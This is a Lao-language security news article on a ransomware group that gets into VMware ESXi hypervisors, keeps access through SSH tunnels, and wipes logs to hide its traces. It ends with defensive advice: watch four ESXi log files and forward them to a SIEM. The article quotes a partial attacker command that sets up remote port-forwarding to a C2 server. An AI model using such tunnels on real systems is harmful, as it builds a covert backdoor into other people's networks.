ພົບ​ກຸ່ມ​ ມັນແວຮຽກຄ່າໄຖ່​ (Ransomware) ທີ່​ກຳ​ລັງມີເປົ້າ​ໝາຍ​ການ​ໂຈມ​ຕີ​ໄປທີ່ Hypervisors ຂອງ​ ESXi ໂດຍ​ໃຊ້​ SSH tunneling ເພື່ອ​ເຂົ້າ​ເຖິງ​ ແລະ ​ແຝງ​ຕົວ​ໃນ​ລະບົບ​ຂອງ​ເປົ້າ​ໝາຍ​ໄດ້​ໂດຍ​ບໍ່​ຖືກ​ກວດ​ຈັບ.​

VMware ESXi appliance ມີ​ຄວາມ​ສຳຄັນ​ຕໍ່​ Virtualized Environment ເນື່ອງ​ຈາກ​ສາມາດ​ເຮັດວຽກ​ເທິງ​ physical server ຫຼື​ multiple virtual machines ຂອງ​ອົງ​ກອນໄດ້​ ໂດຍ​ສ່ວນ​ໃຫຍ່​ແລ້ວ​ລະບົບ​ເຫຼົ່າ​ນີ້​ມັກ​ບໍ່​ໄດ້ຮັບ​ການ​ກວດ​ສອບ​ ແລະ​ ຕົກ​ເປັນ​ເປົ້າ​ໝາຍ​ຂອງ​ກຸ່ມ​ Hacker ທີ່​ຕ້ອງ​ການ​ເຂົ້າ​ເຖິງ​ເຄືອ​ຂ່າຍ​ຂອງ​ອົງ​ກອນ​ ເຮັດໃຫ້​ສາມາດ​ລັກ​ຂໍ້​ມູນ​ ແລະ ​ເຂົ້າ​ລະ​ຫັດ​ຟາຍ​ໄດ້​ ເຮັດ​ໃຫ້​ທຸລະກິດ​ທັງ​ໝົດ​ຢຸດ​ຊະ​ງັກ​ ເນື່ອງ​ຈາກ​ບໍ່​ສາມາດ​ເຂົ້າ​ເຖິງ​ virtual machines ທັງ​ໝົດ​ໄດ້​.

Sygnia ບໍລິສັດ​ດ້ານ​ຄວາມ​ປອດໄ​ພ​ທາງ​ໄຊ​ເບີ ​ລາຍ​ງານ​ວ່າ​ໃນ​ຫຼາຍ​ໆກໍລະນີ​ ການ​ໂຈມ​ຕີ​ເກີດ​ຂຶ້ນ​ໂດຍ​ການ​ໃຊ້​ຊ່ອງ​ໂຫວ່​ທີ່​ເປັນ​ທີ່​ຮູ້​ຈັກ​ຢູ່​ແລ້ວ​ ຫຼື ​ໃຊ້​ຂໍ້​ມູນທີ່ສໍາຄັນໃນການຢືນຢັນສິດ (credentials) ຂອງ​ຜູ້​ເບິ່ງ​ແຍງ​ລະບົບ​ທີ່​ຖືກ​ລັກ​ມາ​ຈາກ​ການ​ໂຈມ​ຕີ​ອື່ນ​.

ການ​ໃຊ້​ SSH ເພື່ອ​ເຂົ້າ​ສູ່​ Hypervisor

ESXi ມີ​ຄຸນສົມບັດ (Feature) built-in SSH service ທີ່​ຊ່ວຍ​ໃຫ້​ຜູ້​ເບິ່ງ​ແຍງ​ລະບົບ​ສາມາດ​ຈັດການ​ hypervisor ຈາກ​ໄລຍະ​ໄກລ​ຜ່ານ​ SSH ໄດ້.​

Sygnia ລະ​ບຸ​ວ່າ​ ກຸ່ມ​ Ransomware ໄດ້​ໃຊ້​ຄຸນສົມບັດ​ນີ້​ເພື່ອ​ແຝງ​ຕົວ​ ລວມ​ເຖິງ​ແຜ່ກ​ະ​ຈາຍ​ຕໍ່ໄປ​ໃນ​ລະບົບ​ ແລະ​ ຕິດ​ຕັ້ງ​ເພ​ໂຫຼດ (Playload) ​ຂອງ​ Ransomware ເນື່ອງ​ຈາກ​ອົງ​ກອນ​ຫຼາຍ​ແຫ່ງ​ບໍ່​ໄດ້​ກວດ​ສອບ​ພຶດຕິກຳ​ SSH ຂອງ​ ESXi ຢ່າງ​ຈິງ​ຈັງ​ Hacker ຈຶ່ງ​ສາມາດ​ໃຊ້​ຄຸນສົມບັດນີ້​ເພື່ອ​ລັກໂຈມ​ຕີ​ໄດ້​.

ເມື່ອ​ Hacker ສາມາດ​ເຂົ້າ​ເຖິງ​ອຸປະກອນ​ໄດ້​ແລ້ວ​ ກໍ​່ສາມາດ​ຕັ້ງ​ຄ່າ​ເພື່ອສ້າງ​ SSH tunneling ໄດ້​ຢ່າງ​ງ່າຍ​ດາຍ​ ໂດຍ​ໃຊ້​ SSH function ຫຼື ​ໃຊ້​ເຄື່ອງ​ມື​ທົ່ວ​ໄປ​ອື່ນ​ໆ​ ທີ່​ມີ​ຄວາມ​ສາມາດ​ຄ້າຍ​ຄືກັນ​ ຕົວ​ຢ່າງ​ເຊັ່ນ:​ ການ​ໃຊ້​ SSH binary ຈະ​ສາມາດ​ຕັ້ງ​ຄ່າ​ remote port-forwarding ໄປຫາ C2 server ໄດ້​ຢ່າງ​ງ່າຍ​ດາຍ​ ໂດຍ​ໃຊ້​ຄຳ​ສັ່ງ​ຕໍ່ໄປ​ນີ້​: ssh –fN -R 127.0.0.1: @

ໃນກໍລະນີນີ້​ ESXi appliance ມີ​ຄວາມ​ຢືດຢຸ່ນ​ ແລະ ​ເກືອບຈະ​ບໍ່​ເຄີຍ​ປິດ​ລະບົບ.​ ດັ່ງ​ນັ້ນ, ​ການສ້າງ​ SSH tunneling ຈຶ່ງ​ເຮັດ​ຫນ້າທີ່ສະ​ເໝືອນ​ເປັນ​ semi-persistent backdoor ພາຍ​ໃນ​ເຄືອ​ຂ່າຍ​.

ຂໍ້ບົກພ່ອງໃນ​ການ​ Logging

ລວມ​ເຖິງ​ Sygnia ໄດ້ລ​ງານ​ເຖິງ​ຂໍ້​ບົກພ່ອງ​ໃນ​ການ​ Monitoring ESXi logs ທີ່​ເຮັດໃຫ້​ Hacker ສາມາດ​ເຊື່ອງ​ Log ທີ່​ສະແດງ​ເຖິງ​ການ​ໂຈມ​ຕີ​ໄດ້.​

ການ​ Logging ຂອງ​ ESXi ບໍ່ຄືລະບົບ​ສ່ວນ​ໃຫຍ່​ທີ່​ log ຈະ​ຖືກ​ສັງລວມ​ໄວ້​ໃນ​ຟາຍ​ syslog ດຽວ​ ແຕ່​ ESXi ຈະ​ກະ​ຈາຍ​ log ໄປ​ທີ່​ log file ສະເພາະ​ຫຼາຍ​ຟາຍ.​ ດັ່ງ​ນັ້ນ, ​ການ​ຄົ້ນ​ຫາ​ຫຼັກ​ຖານ​ຈຶ່ງ​ຕ້ອງ​ສັງລວມ​ຂໍ້​ມູນ​ຈາກ​ຫຼາຍ​ແຫຼ່ງ​ເຂົ້າ​ນຳກັນ​.

Sygnia ໄດ້​ແນະ​ນຳ​ໃຫ້​ຜູ້​ເບິ່ງ​ແຍງ​ລະບົບ​ກວດ​ສອບ​ log file ທັງ​ 4 ລາຍ​ການ​ນີ້ ​ເພື່ອ​ກວດ​ຈັບ​ການສ້າງ​ SSH tunneling ແລະ ​ການ​ໂຈມ​ຕີຂອງ Ransomware:

/var/log/shell.log → ຕິດ​ຕາມ​ການ​ເອີ້ນໃຊ້​ຄຳ​ສັ່ງ​ໃນ​ ESXi Shell
/var/log/hostd.log → ບັນ​ທຶກ​ກິດຈະກຳ​ການ​ບໍລິຫານ​ຈັດການ​ລະບົບ​ ແລະ ​ການ​ກວດ​ສອບ​ສິດ​ຂອງ​ຜູ້​ໃຊ້​
/var/log/auth.log → ບັນ​ທຶກ​ຄວາມ​ພະຍາຍາມ​ໃນ​ການ​ login ແລະ​ authentication event
/var/log/vobd.log → ຈັດ​ເກັບ​ system ແລະ​ security event log

ນອກ​ຈາກ​ນີ້​ hostd.log ແລະ​ vodb.log ຍັງ​ອາດຈະ​ມີ​ຮ່ອງ​ຮອຍ​ຂອງ​ການ​ແກ້​ໄຂ​ firewall rules ຊຶ່ງ​ຖື​ເປັນ​ສິ່ງ​ສຳຄັນ​ໃນ​ການ​ອະນຸຍາດ​ການ​ເຂົ້າ​ເຖິງ​ SSH ແບບ​ຕໍ່​ເນື່ອງ​.

ຂໍ້​ສັງເກດ​ກຸ່ມ​ Ransomware ມັກ​ຈະ​ລຶບ​ log ເພື່ອລຶບ​ຫຼັກ​ຖານ​ການ​ເຂົ້າ​ເຖິງ​ SSH, ແກ້​ໄຂ​ວັນທີ​ ແລະ​ ເວລາ​ ຫຼື ​ຕັດ​ຮອນ​ log ເພື່ອ​ເຮັດໃຫ້​ສັບ​ສົນ​ໃນ​ການ​ຄົ້ນ​ຫາ.​ ດັ່ງ​ນັ້ນ, ​ການ​ຄົ້ນ​ຫາ​ຫຼັກ​ຖານ​ຈຶ່ງ​ບໍ່​ແມ່ນ​ເລື່ອງ​ງ່າຍ​ສະເໝີ​ໄປ​.

ສຸດທ້າຍແລ້ວ ​ຂໍ​ແນະ​ນຳ​ໃຫ້​ອົງກອນສັງລວມ​ ESXi logs ໂດຍ​ການ​ສົ່ງ​ຕໍ່​ syslog ແລະ​ ສັງລວມ​ຂໍ້​ມູນ​ໄປ​ທີ່​ Security Information & Event Management (SIEM) ເພື່ອ​ໃຊ້​ສຳລັບ​ກວດ​ຈັບ​ຄວາມ​ຜິດ​ປົກກະຕິ​.

ເອກະສານອ້າງອີງ:

1. https://www.bleepingcomputer.com/news/security/ransomware-gang-uses-ssh-tunnels-for-stealthy-vmware-esxi-access/
2. https://www.i-secure.co.th/2025/01/%e0%b8%9e%e0%b8%9a%e0%b8%81%e0%b8%a5%e0%b8%b8%e0%b9%88%e0%b8%a1-ransomware-%e0%b9%83%e0%b8%8a%e0%b9%89-ssh-tunnels-%e0%b9%80%e0%b8%9e%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b9%80%e0%b8%82%e0%b9%89%e0%b8%b2/